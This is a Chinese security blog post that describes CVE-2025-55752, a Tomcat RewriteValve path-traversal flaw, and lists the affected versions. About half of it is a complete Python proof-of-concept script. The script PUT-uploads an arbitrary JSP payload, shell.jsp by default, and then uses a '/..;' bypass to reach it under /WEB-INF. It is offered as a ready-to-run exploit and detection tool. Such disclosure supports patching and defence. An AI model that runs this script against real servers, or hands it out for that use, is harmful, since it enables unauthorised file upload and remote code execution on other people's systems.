CVE-2025-55752|Apache Tomcat目录遍历漏洞(POC)
CVE-2025-55752|Apache Tomcat目录遍历漏洞(POC)
信安百科
发布于 2025-11-24 13:58:53
发布于 2025-11-24 13:58:53
0x00 前言
Tomcat是Apache软件基金会(Apache Software Foundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。
Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP程序的首选。
Tomcat和Nginx、Apache(httpd)、lighttpd等Web服务器一样,具有处理HTML页面的功能,另外它还是一个Servlet和JSP容器,独立的Servlet容器是Tomcat的默认模式。不过,Tomcat处理静态HTML的能力不如Nginx/Apache服务器。
0x01 漏洞描述
Tomcat的RewriteValve组件提供URL重写功能,类似于Apache HTTP Server的mod_rewrite模块,允许开发者根据规则动态修改请求URL,广泛用于URL美化、请求转发和访问控制等场景。
该漏洞因修复程序出现回归问题所致,在URL重写过程中,系统先对URL进行规范化处理,再执行解码操作,这使得攻击者能够绕过针对/WEB-INF/和/META-INF/的安全防护机制。一旦启用PUT或WebDAV功能,攻击者可借此上传恶意文件并实现远程代码执行(RCE)。虽然PUT请求一般仅对可信用户开放,但配置不当会导致该漏洞被恶意利用。
0x02 CVE编号
CVE-2025-55752
0x03 影响版本
11.0.0-M1 <= Apache Tomcat <= 11.0.10
10.1.0-M1 <= Apache Tomcat <= 10.1.44
9.0.0.M11 <= Apache Tomcat <= 9.0.1080x04 漏洞详情
POC:
https://github.com/TAM-K592/CVE-2025-55752
import requests
import argparse
import urllib3
import sys
from urllib.parse import quote
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BANNER = """
CVE-2025-55752 Tomcat Path Bypass & Upload Detection Script
============================================================
This tool attempts to exploit a Rewrite Valve + normalization bypass to upload a test JSP file
into a protected location (like /WEB-INF) and verify if the server is vulnerable to CVE-2025-55752.
"""
def attempt_put_upload(target, filename, payload, verify_ssl):
upload_path = f"/{filename}"
url = f"{target}{upload_path}"
try:
print(f"[+] Attempting to upload payload to: {url}")
response = requests.put(url, data=payload, verify=verify_ssl, timeout=10)
if response.status_code in [200, 201, 204]:
print(f"[+] Upload successful! Response code: {response.status_code}")
return upload_path
else:
print(f"[-] Upload failed! Response code: {response.status_code}")
return None
except Exception as e:
print(f"[!] Upload error: {e}")
return None
def check_access(target, path, verify_ssl):
bypass_path = f"/..;{path}"
url = f"{target}{bypass_path}"
try:
print(f"[+] Checking access to: {url}")
response = requests.get(url, verify=verify_ssl, timeout=10)
if response.status_code == 200:
print("[+] Bypass successful! Target may be vulnerable.")
return True
else:
print(f"[-] Access denied or not vulnerable (HTTP {response.status_code}).")
return False
except Exception as e:
print(f"[!] Access check error: {e}")
return False
def main():
parser = argparse.ArgumentParser(description="CVE-2025-55752 Exploit & Detection Tool")
parser.add_argument("url", help="Target base URL (e.g., http://127.0.0.1:8080)")
parser.add_argument("--filename", default="shell.jsp", help="Filename to upload (default: shell.jsp)")
parser.add_argument("--payload", default="<% out.println(\"Bypassed!\"); %>", help="Payload content to upload")
parser.add_argument("--check", action="store_true", help="Only check for path bypass without uploading")
parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL certificate verification")
args = parser.parse_args()
print(BANNER)
verify_ssl = not args.no_ssl_verify
if not args.url.startswith("http"):
print("[-] Please include http:// or https:// in the URL")
sys.exit(1)
if args.check:
check_access(args.url, f"/WEB-INF/{args.filename}", verify_ssl)
else:
uploaded_path = attempt_put_upload(args.url, args.filename, args.payload, verify_ssl)
if uploaded_path:
check_access(args.url, f"/WEB-INF/{args.filename}", verify_ssl)
if __name__ == "__main__":
main()0x05 参考链接
https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog
推荐阅读:
CVE-2025-24813|Apache Tomcat远程代码执行漏洞(POC)
CVE-2025-56383|Notepad++ DLL劫持漏洞(POC)
CVE-2025-49113|Roundcube Webmail反序列化漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-11-15,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
